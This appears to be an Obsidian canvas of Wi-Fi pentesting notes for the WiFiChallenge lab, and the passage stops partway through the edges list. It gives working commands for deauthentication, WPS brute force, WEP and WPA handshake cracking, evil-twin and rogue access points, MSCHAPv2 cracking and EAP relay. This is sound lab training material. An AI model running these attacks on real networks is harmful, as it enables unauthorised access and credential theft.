{
	"nodes":[
		{"id":"d672aba63051cc80","type":"text","text":"# Identify SSID of HIDDEN network\n```bash\n# dictionary attack to find unknown ESSID (name)\n# set channel to 11 on device wlan0mon \niwconfig wlan0mon channel 11\n# bruteforce\nmdk4 wlan0mon p -t F0:9F:C2:6A:88:26 -f ~/wifi-rockyou.txt\n```","x":2160,"y":218,"width":589,"height":215},
		{"type":"text","text":"Hidden network","id":"9ac3fb17a82ed1fd","x":1700,"y":295,"width":240,"height":60,"color":"2"},
		{"id":"18a732f7c53798ff","type":"text","text":"WPS","x":1700,"y":720,"width":240,"height":60,"color":"2"},
		{"id":"4f7c2eb3dc56ed83","type":"text","text":"# WPS\n```bash\n# Monitor for WPS traffic\n$ airodump-ng wlan0mon -w /tmp/scans_dir --manufacturer --wps --band abg [-c <channell>] [--bssid <BSSID>]\n```","x":2160,"y":670,"width":1080,"height":160},
		{"id":"b2840f2311453f44","type":"text","text":"\n# OPEN NETWORK (ENC = OPN)\n`ENC=OPN` oznacza, że sieć nie jest szyfrowana – cały ruch po warstwie 2 jest **czytelny w plaintext**, więc wystarczy **sniffować pakiety**.\n```bash\n# create config file to connect to wi-fi with wpa_supplicant\n$ cat > wifi-guest.conf << EOF\nnetwork={\n  ssid=\"wifi-guest\"\n  scan_ssid=1\n  key_mgmt=NONE\n}\nEOF\n```","x":2160,"y":880,"width":1080,"height":320},
		{"id":"bd75bf1b381f1d56","type":"text","text":"# WEP\n```bash\n# Monitor for WEP traffic\n$ airodump-ng wlan0mon -w /tmp/scans_dir --encrypt wep --manufacturer --wps --band abg [-c <channell>] [--bssid <BSSID>]\n```","x":2160,"y":1288,"width":1080,"height":160},
		{"id":"3e55bdbc8cc7e296","type":"text","text":"OPN","x":1700,"y":1002,"width":240,"height":60,"color":"2"},
		{"type":"text","text":"**WEP** (Wired Equivalent Privacy)","id":"86454a6c9a01d61b","x":1700,"y":1338,"width":400,"height":62,"color":"2"},
		{"type":"text","text":"Identify target","id":"dadee9e8ed52a2cd","x":940,"y":1840,"width":300,"height":50,"color":"#ff00bb"},
		{"id":"c786083b385edfc8","type":"text","text":"**WPA-PSK (WPA Personal)**\npierwsza generacja WPA z hasłem współdzielonym (pre-shared key), wykorzystująca TKIP.","x":1719,"y":1693,"width":501,"height":127,"color":"2"},
		{"id":"cf4a985aad5601a9","type":"text","text":"```bash\n# wifi-mobile.conf – configuration file for WPA2-PSK (CCMP)\n$ cat > wifi-mobile.conf <<EOF\nnetwork={\n  ssid=\"wifi-mobile\"\n  psk=\"starwars1\" # cracked password\n  scan_ssid=1\n  key_mgmt=WPA-PSK\n  # proto=WPA2\n}\nEOF\n```","x":6140,"y":2700,"width":699,"height":244},
		{"id":"a8126af2d0dceb4a","type":"text","text":"# WPA Handshake Harvesting via Fake Access Point with hostapd-mana\n\n```bash\n$ hashcat -a 0 -m 22000 hash ~/rockyou-top100000.txt --force\n```\n![[Pasted image 20250515151329.png]]","x":4876,"y":2850,"width":699,"height":302},
		{"id":"70de4a62fde6c199","type":"text","text":"run Wireshark","x":7180,"y":2436,"width":250,"height":60},
		{"id":"2daa29b56811cbf5","type":"text","text":"```bash\n# decrypt captured traffic with found password\nairdecap-ng -e wifi-mobile -p $PASSWORD ~/wifi/scan-02-dec.cap\n# Output will be: scan-02-dec.cap (decrypted pcap)\n```\n\n","x":6140,"y":2411,"width":960,"height":110},
		{"id":"7b240de3790e40ae","type":"text","text":"# WPA Handshake Harvesting via Fake Access Point with hostapd-mana\n```bash\n$ $cat hash\nWPA*02*6e9584689112be5946f40c0122f8616a*02000000...\n```\n\n![[Pasted image 20250515151232.png]]\n","x":4051,"y":2700,"width":699,"height":600},
		{"id":"479ce52480602738","type":"text","text":"# WPA2, CCMP TKIP, PSK\nhttps://r4ulcl.com/posts/walkthrough-wifichallenge-lab-2.0/#08-what-is-the-wifi-mobile-ap-password\n\n\n```bash\n# crack password from captured handshake\naircrack-ng scan-02.cap -w ~/rockyou-top100000.txt\n```\n\n","x":4240,"y":2374,"width":960,"height":184},
		{"id":"63f73034f8a1fd8d","type":"text","text":"# Evil Twin / Phishing for WPA Password","x":2760,"y":2955,"width":391,"height":91},
		{"type":"text","text":"**WPA2-PSK (WPA2 Personal)**\n**WPA2 TKIP PSK**\n**WPA2 CCMP PSK**\n\nWi-Fi Protected Access 2 – Personal\n\n- Używa wspólnego hasła (pre-shared key) znanego wszystkim uprawnionym użytkownikom.\n- wprowadza obowiązkowo algorytm AES-CCMP\n- WPA2 nie jest podatne na pasywne ataki kryptograficzne. Zamiast tego pentester koncentruje się na **uzyskaniu handshake lub innych danych uwierzytelniających**, które umożliwią późniejsze odgadnięcie hasła metodą słownikową lub brute-force offline\n\n|WPA|WPA2|\n|-|-|\n|używał TKIP|algorytm AES-CCMP do ochrony danych|\n||opiera się na tzw. **4-way handshake** – protokole wymiany kluczy między klientem a AP w momencie łączenia.|","id":"5ed3ed64a4092e98","x":1719,"y":1993,"width":756,"height":519,"color":"2"},
		{"id":"59de13b5afbc21a2","type":"text","text":"WPS Pin Brute-force","x":2760,"y":2228,"width":370,"height":50},
		{"id":"b9b732c821b5d037","type":"text","text":"# Deautentykacja i przechwycenie 4-way handshake\n\n\nWPA2 w wydaniu standardowym jest podatne na deauth (brak zabezpieczenia ramek zarządzających). Jednak standard 802.11w (MFP) wprowadza ochronę ramek deauth/disassoc poprzez ich podpisywanie. Jeśli sieć WPA2 ma **wymuszone PMF (Management Frame Protection) = required**, to klient i AP ignorują nieautoryzowane ramki deautentykacji.","x":2760,"y":2370,"width":420,"height":190},
		{"id":"957bb9349786b029","type":"text","text":"# WPA2, CCMP TKIP, PSK\nhttps://r4ulcl.com/posts/walkthrough-wifichallenge-lab-2.0/#08-what-is-the-wifi-mobile-ap-password\n\n\n```bash\n# monitor the traffic\nairodump-ng wlan0mon -w ~/wifi/scan --manufacturer --wps --band abg --bssid F0:9F:C2:71:22:12 -c 6\n\n# wait for a client to connect or force a deauth attack\naireplay-ng -0 10 -a F0:9F:C2:71:22:12 wlan0mon # force deaut\n\n# handshakes will be caught by running airodump-ng process\n```\n\n","x":3208,"y":2320,"width":960,"height":292},
		{"id":"81a4fd5d0495390d","type":"text","text":"# WPA Handshake Harvesting via Fake Access Point with hostapd-mana\n\n```bash\n# configure hostapd-mana\n$ cat hostapd.conf \ninterface=wlan1\ndriver=nl80211\nhw_mode=g\nchannel=1\nssid=wifi-offices\nmana_wpaout=hostapd.hccapx\nwpa=2\nwpa_key_mgmt=WPA-PSK\nwpa_pairwise=TKIP CCMP\nwpa_passphrase=12345678\n\n# start hostapd-mana\n$ hostapd-mana hostapd.conf\n```\n","x":3285,"y":2788,"width":699,"height":425},
		{"type":"text","text":"WPA2- MGT\nWPA2 CCMP MGT","id":"582decafbfab0338","x":1720,"y":4880,"width":440,"height":119,"color":"2"},
		{"id":"73a92a2dd5fbcc50","type":"text","text":"# Connect to WEP Wi-Fi\n```bash\n# Create the Configuration File\ncat > wep.conf << EOF\nnetwork={\n  ssid=\"<ESSID>\"\n  key_mgmt=NONE\n  wep_key0=11AA22BB33 # Replace with the cracked key (without \":\")\n  wep_tx_keyidx=0\n}\nEOF\n```\nOR \n```WEP-conf\nnetwork={\n\tssid=\"<ESSID>\"\n\tscan_ssid=1\n\tkey_mgmt=NONE\n\twep_key0=1A2B3C4D5E\n}\n```\nOR\n```WEP-conf\nnetwork={\nssid=\"enter name of network\"\nkey_mgmt=NONE\nwep_key0=\"enter password/key\"\nwep_tx_keyidx=0\n}\n```","x":4280,"y":1184,"width":840,"height":368},
		{"id":"ddd21fdb9b5fd458","type":"text","text":"# Connect to Wi-Fi\n```bash\n# Connect Using wpa_supplicant\n$ wpa_supplicant -D nl80211 -i wlan2 -c wep.conf\n\n# Get IP Address (in separate terminal)\n$ dhclient wlan2 -v\n```\n","x":5220,"y":1263,"width":500,"height":211},
		{"id":"1b24b7c10269f89d","type":"text","text":"# Brute-Force PIN\n```bash\n$ reaver -b <BSSID> -i wlan0mon -vv\n```","x":3340,"y":604,"width":540,"height":141},
		{"id":"0bd6f0ebeee23beb","type":"text","text":"# PixieWPS attack\n```bash\nsudo reaver -b <BSSID-MAC-AP> -i <INTERFACE> -v -K\n```","x":3340,"y":774,"width":540,"height":113},
		{"id":"45cdbf0c22bc36b3","type":"text","text":"# Connect to OPEN Wi-Fi\n```bash\n# connect to wi-fi [with driver -Dnl80211] interface wlan2 with configs wifi-guest.conf\n$ wpa_supplicant [-D nl80211] -iwlan2 -c wifi-guest.conf\n```\n\n```bash\n# in different second get DHCP lease (get IP from DHCP)\n$ dhclient wlan2 -v\n```","x":3340,"y":913,"width":860,"height":239},
		{"id":"6771d08b8ec700f3","type":"text","text":"# Recovering WEP Key via besside-ng\nhttps://r4ulcl.com/posts/walkthrough-wifichallenge-lab-2.0/#07-get-wifi-old-password\n```bash\n$ airmon-ng check kill\n$ besside-ng -c 3 -b F0:9F:C2:71:22:11 wlan2 -v\n# -c <channel>\n# -b <AP_bssid> # WEP AP BSSID\n# wlan2 - interface to use\n\n# Wait for:  \n# `KEY FOUND! [ XX:XX:XX:XX:XX ]`  \n\n# key in besside-ng terminal output and in besside.log file\n```\n","x":3340,"y":1197,"width":860,"height":342},
		{"id":"e8c7f316219d9be0","type":"text","text":"# Test Single PIN (Blank/Default)\n```bash\nreaver -b <BSSID> -i wlan0mon -p '' -vv\n```","x":3340,"y":440,"width":540,"height":141},
		{"id":"d85622deffd1cca1","type":"text","text":"# Connect to Wi-Fi\n```bash\n# connect to wi-fi with driver -Dnl80211 interface wlan3 with configs wifi-mobile.conf \n$ wpa_supplicant -Dnl80211 -iwlan3 -c wifi-mobile.conf \n\n# in different second get DHCP lease (get IP from DHCP)\n$ dhclient wlan3 -v\n\n```","x":6920,"y":2716,"width":880,"height":213},
		{"id":"28376536ee85fda7","type":"text","text":"# TOOLS\n# [wifi_db](https://github.com/r4ulcl/wifi_db)\nhttps://r4ulcl.com/posts/wifi_db/ - use\nScript to parse `aircrack-ng` captures into a SQLite database and extract useful information\n```bash\n$ python3 wifi_db.py -d database.sqlite ~/wifi\n# -d database.sqlite - save the new database to the file “database.sqlite”\n# ~/wifi - parse files in folder\n\nsqlitebrowser database.sqlite\n```\n\n\n\n\n\n# [pcapFilter.sh](https://gist.github.com/r4ulcl/f3470f097d1cd21dbc5a238883e79fb2)\n\nTtshark filter script to get WPA-EAP Identities, EAP certs, HTTP passwords, Handshakes, DNS queries, NBTNS queries and LLMNR queries. Reading a file or a folder\n\n```bash\n$ bash pcapFilter.sh -f ~/wifi -A | tee ~/wifi_pcapFilet_out\n```","x":-1240,"y":2575,"width":1439,"height":495},
		{"id":"0f044b652072fca6","type":"text","text":"# MGT Networks - domain of users\nIn MGT networks misconfigured users can send their Identity (username) in clear text before performing the TLS tunnel\n\n**use [wifi_db](https://github.com/r4ulcl/wifi_db)**\n**OR with wireshark**\n![[Pasted image 20250519150521.png]]","x":-1240,"y":3292,"width":699,"height":560},
		{"id":"eb692c79dc603993","type":"text","text":"# Certificates\nuse [pcapFilter.sh](https://gist.github.com/r4ulcl/f3470f097d1cd21dbc5a238883e79fb2)\nOR \nWireshark\n\n![[Pasted image 20250519152517.png]]\n```bash\n(wlan.sa == f0:9f:c2:71:22:15) && (tls.handshake.certificate)\n```","x":-500,"y":3292,"width":699,"height":560},
		{"id":"ea45672fd9c4a50d","type":"text","text":"```bash\n# catch wifi 802.11 frames (scan wifi) (2.4 + 5 GHz) and get data about surrounding\n$ airodump-ng wlan0mon -w /tmp/scans_dir --manufacturer --wps --band abg [-c <channell>] [--bssid <BSSID>]\n\n$ airodump-ng wlan0mon -w /tmp/scans_dir --manufacturer --wps --band abg -c 11 --bssid F0:9F:C2:6A:88:26\n```","x":-235,"y":1798,"width":1000,"height":135},
		{"id":"3d5e4eac17730dbf","type":"text","text":"# Find WiFi networks and its info\n","x":28,"y":1400,"width":474,"height":76},
		{"id":"7249fc968f628e7c","type":"text","text":"```bash\n$ nmcli dev wifi list\n```\n","x":86,"y":1597,"width":358,"height":80},
		{"id":"3b9260597c4fa8fd","type":"text","text":"# Connect VM to USB wifi adapter\n<iframe width=100%  height=500 src=\"https://www.youtube.com/embed/_tKg9dMu4WQ?si=GD4U72GuK_7-b2y1\" frameborder=\"0\" allowfullscreen></iframe>","x":-1440,"y":1639,"width":920,"height":661},
		{"id":"7d3fc419d4450163","type":"link","url":"https://lab.wifichallenge.com/","x":-1440,"y":859,"width":920,"height":725},
		{"id":"42770b478eee6d9f","type":"text","text":"**WPA2/WPA3 Enterprise (802.1X)**\ntryb Enterprise wykorzystujący serwer RADIUS i protokół EAP (np. PEAP, EAP-TLS) dla unikalnych danych logowania.\n\nSieci z 802.1X, AUTH=MGT\n`MGT` (od _Management_, co oznacza zewnętrzny serwer uwierzytelniania)","x":1769,"y":5440,"width":343,"height":320},
		{"id":"2a9b7a88933ae641","type":"text","text":"```bash\n# TODO\n# sae.conf – configuration file for WPA3 CCMP SAE\n$ cat > sae.conf <<EOF\nnetwork={\n  ssid=\"wifi-management\"\n  scan_ssid=1\n  psk=\"chocolate1\"\n  key_mgmt=SAE\n  # ieee80211w=2\n}\nEOF\n```","x":4640,"y":3619,"width":699,"height":280},
		{"id":"65b0de075cfb5a0e","type":"text","text":"```bash\n# connect to wi-fi with driver -Dnl80211 interface wlan3 with configs sae.conf\n$ wpa_supplicant -Dnl80211 -iwlan3 -c sae.conf\n\n# in different second get DHCP lease (get IP from DHCP)\n$ dhclient wlan3 -v\n```","x":5400,"y":3690,"width":821,"height":140},
		{"id":"ca81c743ee07eb7b","type":"text","text":"**Brute force**\n\nhttps://r4ulcl.com/posts/walkthrough-wifichallenge-lab-2.0/#sae-wpa3\nhttps://github.com/blunderbuss-wctf/wacker - dictionary attack against a WPA3 access point\n\n```bash\n# dictionaruy attack against WPA3 SAE Access Point\n$ ./wacker.py --wordlist ~/rockyou-top100000.txt --ssid wifi-management --bssid F0:9F:C2:11:0A:24 --interface wlan2 --freq 2462\n# --freq is based on channel of the AP\n```\n\nIf no password found, consider using another dictionary or another attack if possible","x":3414,"y":3627,"width":1140,"height":265},
		{"type":"text","text":"**WPA3-SAE (WPA3 Personal)**\n**WPA3 CCMP SAE**\n\n- następca WPA2-PSK, wprowadzony w 2018 (SAE – _Simultaneous Authentication of Equals_)\n- Tradycyjny 4-way handshake WPA2 został zastąpiony przez **Dragonfly Handshake (SAE)**\n- WPA3 WPA2, CCMP, SAE PSK","id":"178079b7a8b36ae2","x":1700,"y":3504,"width":756,"height":240,"color":"2"},
		{"id":"b68ad5aa335e185c","type":"text","text":"**Deauth Attack to harvest handshake** \n```bash\nsudo aireplay-ng <interface> -0 0 -a <AP_MAC> -c <Client_MAC>\n```","x":3414,"y":3440,"width":604,"height":128},
		{"id":"8c7cdddc82f0b86e","type":"text","text":"Check if Management Frame Protection (MFP/MPF/PMF) is set to disable\n```bash\nwireshark <CAPTURED-FILE-WIFI-NETWORK.cap>\n```\n```bash\n# filter to find packets with ENABLED MFP\n(((wlan.fc.type_subtype == 0x0008) && (wlan.rsn.capabilities)) && (wlan.rsn.capabilities.mfpc == 0 &&wlan.rsn.capabilities.mfpr == 0))\n```","x":2501,"y":3497,"width":680,"height":255},
		{"id":"aca48360764a1a57","type":"text","text":"```bash\n# Użytkownik musi podłączyc się do fake AP stworzonego przez eaphammer\n\nOR \n\n# Deautoryzacja klientów z AP\n# Rozpoznaj MAC klientów `wifi-corp` z `airodump-ng`,\n# a następnie deautoryzuj ich,\n# by zmusić do połączenia z RogueAP:\n\n# kanał 44 – AP 1\niwconfig wlan0mon channel 44\naireplay-ng -0 0 -a F0:9F:C2:71:22:1A -c 64:32:A8:BA:6C:41 wlan0mon\n```","x":4343,"y":4630,"width":680,"height":300},
		{"id":"31993a70d9f851d0","type":"text","text":"```bash\n# Łamanie hasła MSCHAPv2\n# Po przechwyceniu danych MSCHAPv2 z RogueAP (w logach `hostapd-eaphammer.log`):\ncat logs/hostapd-eaphammer.log | grep hashcat | awk '{print $3}' >> hashcat.5500\nhashcat -a 0 -m 5500 hashcat.5500 ~/rockyou-top100000.txt --force\n```","x":5063,"y":4710,"width":760,"height":140},
		{"id":"4eaecb00c8412d72","type":"text","text":"# Connect to Wi-Fi\n```bash\n# connect to wi-fi with driver -Dnl80211 interface wlan3 with configs wifi-corp.conf\n$ wpa_supplicant -Dnl80211 -iwlan3 -c wifi-corp.conf \n\n# in different second get DHCP lease (get IP from DHCP)\n$ dhclient wlan3 -v\n```","x":5874,"y":5114,"width":880,"height":213},
		{"id":"63f21e171c591b78","type":"text","text":"- **WPA2-Enterprise** (oznaczane też jako **WPA2-EAP**)\n- Zamiast jednego hasła dla wszystkich, każda stacja dostaje własne poświadczenia (np. login/hasło domenowe, certyfikat klienta itp.). Klucz sesji jest negocjowany dynamicznie po pomyślnym uwierzytelnieniu użytkownika wobec serwera.\n- WPA2 (AES-CCMP)\n- Dla sieci WPA2-Enterprise zobaczymy zazwyczaj: `WPA2 CCMP MGT`","x":2291,"y":4818,"width":571,"height":243},
		{"id":"e6a926e28a875ca1","type":"text","text":"https://github.com/s0lst1c3/eaphammer/\n```bash\n# Utworzenie RogueAP z EAPHammer\npython3 ./eaphammer -i <INTERFACE> --auth wpa-eap --essid <SSID> --creds --negotiate balanced\n```\n","x":3303,"y":4710,"width":960,"height":140},
		{"id":"6d91ba6e247c85bf","type":"text","text":"**Attack Password**\nhttps://github.com/Wh1t3Rh1n0/air-hammer\n```bash\ncd  ~/tools/air-hammer\necho 'CONTOSO\\test' > test.user\n./air-hammer.py -i wlan3 -e wifi-corp -p ~/rockyou-top100000.txt -u test.user\n```","x":3303,"y":4940,"width":960,"height":200},
		{"id":"b7df53a1b0e86d8a","type":"text","text":"**Attack User**\nhttps://github.com/Wh1t3Rh1n0/air-hammer\n```bash\ncat ~/top-usernames-shortlist.txt | awk '{print \"CONTOSO\\\\\" $1}' > ~/top-usernames-shortlist-contoso.txt\ncd  ~/tools/air-hammer\n./air-hammer.py -i wlan4 -e wifi-corp -P 12345678 -u ~/top-usernames-shortlist-contoso.txt\n```","x":3303,"y":5160,"width":960,"height":200},
		{"id":"eb47191c6eac91a8","type":"text","text":"Attack as rogue AP","x":2983,"y":4750,"width":250,"height":60,"color":"5"},
		{"id":"c3dbc02811a47de7","type":"text","text":"**WPA dla sieci domowych**","x":1953,"y":2955,"width":251,"height":60,"color":"4"},
		{"id":"d27ec9cfcadc760e","type":"text","text":"# Change MAC address\n\n```bash\n# change mac of interface wlan2 to real wi-fi user\nsystemctl stop network-manager\nip link set wlan2 down\nmacchanger -m b0:72:bf:44:b0:49 wlan2\nip link set wlan2 up\n```\n","x":-1440,"y":456,"width":546,"height":204},
		{"id":"4c7115f279b06b62","type":"text","text":"```bash\n# wifi-mobile.conf – configuration file for WPA2-PSK (CCMP)\n$ cat > wifi-corp.conf <<EOF\nnetwork={\n  ssid=\"wifi-corp\" # ESSID\n  scan_ssid=1\n  key_mgmt=WPA-EAP\n  identity=\"CONTOSO\\test\" # USER\n  password=\"monkey\" # PASSWD\n  eap=PEAP\n  phase1=\"peaplabel=0\"\n  phase2=\"auth=MSCHAPV2\"\n}\nEOF\n```","x":5140,"y":5061,"width":606,"height":320},
		{"id":"bfe837fcea9ced47","type":"text","text":"# START\n---","x":85,"y":799,"width":360,"height":120},
		{"id":"d8e2b6a0ec1f975a","type":"text","text":"Brute force","x":2983,"y":5110,"width":250,"height":60,"color":"5"},
		{"id":"976c518b49960809","type":"text","text":"Uruchom `wpa_sycophant` i relay\n```bash\n# Shell 3\ncd ~/tools/wpa_sycophant/\n./wpa_sycophant.sh -c wpa_sycophant_example.conf -i wlan3\n```\n```bash\n# Shell 4\ndhclient wlan3 -v\n```","x":5638,"y":5922,"width":602,"height":244},
		{"id":"3cd5f9f38706d5fa","type":"text","text":"WPA3-Enterprise","x":1720,"y":6235,"width":440,"height":80,"color":"2"},
		{"id":"e2cdfb4dc2d02ebf","type":"text","text":"WPA3 (AES/GCMP)\ndla WPA3-Enterprise może być `WPA3 CCMP MGT` (lub WPA3 GCMP MGT jeśli używa 256-bit).","x":2291,"y":6160,"width":571,"height":230},
		{"id":"a55d8f8c51d14fe4","type":"text","text":"Uruchom RogueAP z `berate_ap`\n```bash\n# Shell 1\ncd ~/tools/berate_ap/\n./berate_ap --eap --mana-wpe --wpa-sycophant --mana-credout outputMana.log wlan1 lo wifi-regional-tablets --mac F0:9F:C2:7A:33:28\n```\nDeautoryzacja ofiary\n```bash\n# Shell 2\nairmon-ng start wlan0\niwconfig wlan0mon channel 44\naireplay-ng -0 0 wlan0mon -a F0:9F:C2:7A:33:28 -c 64:32:A8:A9:DE:55\n```\n","x":3846,"y":5876,"width":1044,"height":336},
		{"id":"f6013d9c5abcf499","type":"text","text":"Utwórz plik konfiguracyjny `wpa_sycophant`\n```bash\ncat > ~/tools/wpa_sycophant/wpa_sycophant_example.conf << EOF\nnetwork={\n  ssid=\"wifi-regional-tablets\"\n  scan_ssid=1\n  key_mgmt=WPA-EAP\n  identity=\"\"\n  anonymous_identity=\"\"\n  password=\"\"\n  eap=PEAP\n  phase1=\"crypto_binding=0 peaplabel=0\"\n  phase2=\"auth=MSCHAPV2\"\n  bssid_blacklist=F0:9F:C2:00:00:00\n}\nEOF\n```\n\n`wpa_sycophant` działa jako pośrednik i **łączy się z prawdziwym AP** — nie może łączyć się z własnym (Rogue) AP.\n\nIn case wpa_sycophant fails, try editing the “wpa_sycophant_example.conf” file by changing phase1:\n\n```bash\nphase1=\"peapver=1\"\n```","x":4954,"y":5687,"width":620,"height":713},
		{"id":"3d8ac28a756c0791","type":"text","text":"# wlan1 - sycophant configuration file\n```bash\nnetwork={\nssid=\"<target ESSID>\"\n# The SSID you would like to relay and authenticate against.\nscan_ssid=1\nkey_mgmt=WPA-EAP\n# Do not modify\nidentity=\"\"\nanonymous_identity=\"\"\npassword=\"\"\n# This initialises the variables for me.\n# -------------\neap=PEAP\nphase1=\"crypto_binding=0 peaplabel=0\"\nphase2=\"auth=MSCHAPV2\"\n# Dont want to connect back to ourselves,\n# so add your rogue BSSID here.\nbssid_blacklist=<hostapd-mana MAC>\n}\n```\n```bash\n./wpa_sycophant.sh -c wpa_sycophant_example.conf -i wlan1\n```","x":4145,"y":6505,"width":687,"height":520},
		{"id":"6e2a1138736f8c98","type":"text","text":"# wlan0 - hostapd-mana\n\n```bash\n# configure hostapd-mana\n$ cat hostapd.conf \ninterface=wlan0\nssid=<target ESSID>\nchannel=6\nhw_mode=g\nwpa=3\nwpa_key_mgmt=WPA-EAP\nwpa_pairwise=TKIP CCMP\nauth_algs=3\nieee8021x=1\neapol_key_index_workaround=0\neap_server=1\neap_user_file=hostapd.eap_user\nca_cert=/root/certs/ca.pem\nserver_cert=/root/certs/server.pem\nprivate_key=/root/certs/server.key\nprivate_key_passwd=\ndh_file=/root/certs/dhparam.pem\nmana_wpe=1\nmana_eapsuccess=1\nenable_mana=1\nenable_sycophant=1\nsycophant_dir=/tmp/\n```\n```bash\n# start hostapd-mana\n$ hostapd-mana hostapd.conf\n```\n","x":3344,"y":6440,"width":699,"height":650},
		{"id":"bca1409d00d49714","type":"text","text":"# wlan2 - deauthenticating clients\nDeauth a client connected to the target network so that it (hopefully) connects to our rogue AP, which will relay traffic to sycophant \n\n```bash\naireplay-ng -0 4 -a <target BSSID> -c <target client MAC> wlan2\n```\n\nWe should see the connection in sycophant if everything goes well, and then in wlan2 we can do the following to get an IP dhclient -v wlan1","x":4941,"y":6458,"width":687,"height":615},
		{"id":"13231b08bcc57c7f","type":"text","text":"```bash\n# Ustaw MAC interfejsu RogueAP\nsystemctl stop network-manager\nairmon-ng stop wlan1mon\nip link set wlan1 down\nmacchanger -m F0:9F:C2:00:00:00 wlan1\nip link set wlan1 up\n```\nUwiarygodnienie Rogue AP (podszywanie się pod prawdziwy punkt dostępowy)\n\nAtak typu Evil Twin / Rogue AP polega na stworzeniu fałszywego Access Pointa o tej samej nazwie (SSID) co prawdziwa sieć.\n\nNiektóre systemy operacyjne (np. Windows, Android) mogą priorytetowo wybierać AP na podstawie adresu MAC (BSSID), nie tylko po SSID.\n\nJeśli nasz Rogue AP ma inny MAC niż oryginał, klient może nie połączyć się automatycznie.\nUniknięcie połączenia RogueAP z samym sobą (wpa_sycophant)","x":3344,"y":5946,"width":438,"height":197},
		{"id":"b6b19e5025eae4fe","type":"text","text":"# Setup monitor interface\n```bash\n$ airmon-ng # list interfaces\n$ airmon-ng check kill # kill proceses that interfere\n\n# enable monitor mode\n$ airmon-ng start wlan0\n\n# stop monitor mode\nairmon-ng stop wlan0mon\n```","x":-11,"y":1040,"width":552,"height":280},
		{"id":"d1485d56b78f29ff","type":"text","text":"#TODO \nRelay Attack z **wpa_sycophant**","x":2980,"y":6005,"width":297,"height":80,"color":"5"}
	],
	"edges":[
		{"id":"cb0dc09a58f04e77","fromNode":"3d5e4eac17730dbf","fromSide":"bottom","toNode":"7249fc968f628e7c","toSide":"top"},
		{"id":"56a5681b4f5f467e","fromNode":"ea45672fd9c4a50d","fromSide":"right","toNode":"dadee9e8ed52a2cd","toSide":"left"},
		{"id":"46cce2335ad19fe3","fromNode":"7249fc968f628e7c","fromSide":"bottom","toNode":"ea45672fd9c4a50d","toSide":"top"},
		{"id":"7e664a1d4147fe80","fromNode":"dadee9e8ed52a2cd","fromSide":"right","toNode":"9ac3fb17a82ed1fd","toSide":"left"},
		{"id":"fccebd73c487173b","fromNode":"9ac3fb17a82ed1fd","fromSide":"right","toNode":"d672aba63051cc80","toSide":"left"},
		{"id":"219bf92935dfd342","fromNode":"d672aba63051cc80","fromSide":"right","toNode":"dadee9e8ed52a2cd","toSide":"top"},
		{"id":"867670e975759465","fromNode":"dadee9e8ed52a2cd","fromSide":"right","toNode":"3e55bdbc8cc7e296","toSide":"left"},
		{"id":"d850070c9fd31b4d","fromNode":"dadee9e8ed52a2cd","fromSide":"right","toNode":"86454a6c9a01d61b","toSide":"left"},
		{"id":"5c4738de781e67ec","fromNode":"3e55bdbc8cc7e296","fromSide":"right","toNode":"b2840f2311453f44","toSide":"left"},
		{"id":"c47f3052270fdab8","fromNode":"b2840f2311453f44","fromSide":"right","toNode":"45cdbf0c22bc36b3","toSide":"left"},
		{"id":"56affd22f7be1d0c","fromNode":"86454a6c9a01d61b","fromSide":"right","toNode":"bd75bf1b381f1d56","toSide":"left"},
		{"id":"8760a0c59a3ef0d2","fromNode":"bd75bf1b381f1d56","fromSide":"right","toNode":"6771d08b8ec700f3","toSide":"left"},
		{"id":"a50f24d92c0470b1","fromNode":"6771d08b8ec700f3","fromSide":"right","toNode":"73a92a2dd5fbcc50","toSide":"left"},
		{"id":"70f5735465e4a95e","fromNode":"73a92a2dd5fbcc50","fromSide":"right","toNode":"ddd21fdb9b5fd458","toSide":"left"},
		{"id":"f4885644f7235b76","fromNode":"dadee9e8ed52a2cd","fromSide":"right","toNode":"18a732f7c53798ff","toSide":"left"},
		{"id":"800e3eb6a058aae4","fromNode":"b6b19e5025eae4fe","fromSide":"bottom","toNode":"3d5e4eac17730dbf","toSide":"top"},
		{"id":"5cf3eea6ab66f14b","fromNode":"18a732f7c53798ff","fromSide":"right","toNode":"4f7c2eb3dc56ed83","toSide":"left"},
		{"id":"ca9959f67eeb8a74","fromNode":"4f7c2eb3dc56ed83","fromSide":"right","toNode":"1b24b7c10269f89d","toSide":"left"},
		{"id":"538e714f11b7fb9c","fromNode":"4f7c2eb3dc56ed83","fromSide":"right","toNode":"0bd6f0ebeee23beb","toSide":"left"},
		{"id":"2c989e5e5a1ec17c","fromNode":"4f7c2eb3dc56ed83","fromSide":"right","toNode":"e8c7f316219d9be0","toSide":"left"},
		{"id":"ad34a974146129aa","fromNode":"957bb9349786b029","fromSide":"right","toNode":"479ce52480602738","toSide":"left"},
		{"id":"1cd8c83a46b310d4","fromNode":"cf4a985aad5601a9","fromSide":"right","toNode":"d85622deffd1cca1","toSide":"left"},
		{"id":"ccfaa80a005fb20f","fromNode":"5ed3ed64a4092e98","fromSide":"right","toNode":"63f73034f8a1fd8d","toSide":"left"},
		{"id":"fc1782fbd77f537d","fromNode":"5ed3ed64a4092e98","fromSide":"right","toNode":"b9b732c821b5d037","toSide":"left"},
		{"id":"11df96c0cbc06b44","fromNode":"b9b732c821b5d037","fromSide":"right","toNode":"957bb9349786b029","toSide":"left"},
		{"id":"3cf1e6a9173605e6","fromNode":"dadee9e8ed52a2cd","fromSide":"right","toNode":"5ed3ed64a4092e98","toSide":"left"},
		{"id":"c3a8fc73d79a0f73","fromNode":"63f73034f8a1fd8d","fromSide":"right","toNode":"81a4fd5d0495390d","toSide":"left"},
		{"id":"08580757fa60eb47","fromNode":"5ed3ed64a4092e98","fromSide":"right","toNode":"59de13b5afbc21a2","toSide":"left"},
		{"id":"819dc6d119f3747a","fromNode":"59de13b5afbc21a2","fromSide":"top","toNode":"18a732f7c53798ff","toSide":"bottom"},
		{"id":"56fd27b15d0d0b53","fromNode":"81a4fd5d0495390d","fromSide":"right","toNode":"7b240de3790e40ae","toSide":"left"},
		{"id":"9409285d937a5b65","fromNode":"7b240de3790e40ae","fromSide":"right","toNode":"a8126af2d0dceb4a","toSide":"left"},
		{"id":"119e1ff633610c9e","fromNode":"a8126af2d0dceb4a","fromSide":"right","toNode":"cf4a985aad5601a9","toSide":"left"},
		{"id":"526866fc81e6175c","fromNode":"479ce52480602738","fromSide":"right","toNode":"2daa29b56811cbf5","toSide":"left"},
		{"id":"89bbdb9bb8a6aa9b","fromNode":"479ce52480602738","fromSide":"right","toNode":"cf4a985aad5601a9","toSide":"left"},
